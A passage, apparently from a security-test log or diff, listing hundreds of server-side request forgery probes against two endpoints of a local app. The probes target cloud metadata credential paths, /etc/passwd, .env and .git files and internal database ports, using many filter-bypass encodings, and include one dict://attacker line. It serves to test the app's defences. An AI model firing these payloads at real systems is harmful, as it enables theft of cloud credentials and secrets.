`http://localhost:4200/api/tii_eula?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.0` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/tii_eula?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=3232235521` +- Testing: `http://localhost:4200/api/tii_eula?url=3232235777` +- Testing: `http://localhost:4200/api/tii_eula?url=425.510.425.510` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/tii_eula?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/tii_eula?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/tii_eula?url=instance-data` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A22` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A443` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/tii_eula?url=loopback` +- Testing: `http://localhost:4200/api/tii_eula?url=loopback%3A22` +- Testing: `http://localhost:4200/api/tii_eula?url=loopback%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=loopback%3A443` +- Testing: `http://localhost:4200/api/tii_eula?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/tii_eula?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/tii_eula?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/tii_eula?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/tii_eula?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/tii_eula?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/tii_eula?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/tii_eula?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/tii_eula?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/tii_eula?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/tii_eula?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/tii_eula?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/tii_eula?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/tii_eula?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1%3A80` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/tii_eula?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/tii_eula?url=2130706433%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=3232235521%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=3232235777%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_eula?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_eula?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_eula?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_eula?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/tii_eula?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tii_eula?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tii_eula?url=0%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_eula?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/tii_hook +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/tii_hook?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tii_hook?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/tii_hook?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=0` +- Testing: `http://localhost:4200/api/tii_hook?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/tii_hook?url=127.127.127.127` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.1.3` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.0` +- Testing: `http://localhost:4200/api/tii_hook?url=2130706433` +- Testing: `http://localhost:4200/api/tii_hook?url=017700000001` +- Testing: `http://localhost:4200/api/tii_hook?url=0x7f000001` +- Testing: `http://localhost:4200/api/tii_hook?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/tii_hook?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tii_hook?url=` +- Testing: `http://localhost:4200/api/tii_hook?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/tii_hook?url=` +- Testing: `http://localhost:4200/api/tii_hook?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_hook?url=` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tii_hook?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/tii_hook?url=google.com.localhost` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_hook?url=` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/tii_hook?url=` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_hook?url=` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/tii_hook?url=localtest.me` +- Testing: `http://localhost:4200/api/tii_hook?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/tii_hook?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/tii_hook?url=2130706433%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=3232235521%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=3232235777%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/tii_hook?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/tii_hook?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/tii_hook?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tii_hook?url=0%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=localtest.me` +- Testing: `http://localhost:4200/api/tii_hook?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_hook?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_hook?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/tii_hook?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_hook?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/tii_hook?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/tii_hook?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/tii_hook?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/tii_hook?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.1.3` +- Testing: `http://localhost:4200/api/tii_hook?url=0` +- Testing: `http://localhost:4200/api/tii_hook?url=127.1` +- Testing: `http://localhost:4200/api/tii_hook?url=127.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=localhost` +- Testing: `http://localhost:4200/api/tii_hook?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/tii_hook?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/tii_hook?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/tii_hook?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/tii_hook?url=7F000001` +- Testing: `http://localhost:4200/api/tii_hook?url=2130706433` +- Testing: `http://localhost:4200/api/tii_hook?url=6425673729` +- Testing: `http://localhost:4200/api/tii_hook?url=127001` +- Testing: `http://localhost:4200/api/tii_hook?url=127_0._0_1` +- Testing: `http://localhost:4200/api/tii_hook?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/tii_hook?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/tii_hook?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/tii_hook?url=localtest.me` +- Testing: `http://localhost:4200/api/tii_hook?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/tii_hook?url=127.127.127.127` +- Testing: `http://localhost:4200/api/tii_hook?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=0x7f000001` +- Testing: `http://localhost:4200/api/tii_hook?url=017700000001` +- Testing: `http://localhost:4200/api/tii_hook?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/tii_hook?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/tii_hook?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/tii_hook?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/tii_hook?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/tii_hook?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/tii_hook?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/tii_hook?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tii_hook?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/tii_hook?url=169.254.169.254` +- Testing: `http://localhost:4200/api/tii_hook?url=2852039166` +- Testing: `http://localhost:4200/api/tii_hook?url=7147006462` +- Testing: `http://localhost:4200/api/tii_hook?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/tii_hook?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/tii_hook?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/tii_hook?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/tii_hook?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/tii_hook?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/tii_hook?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: 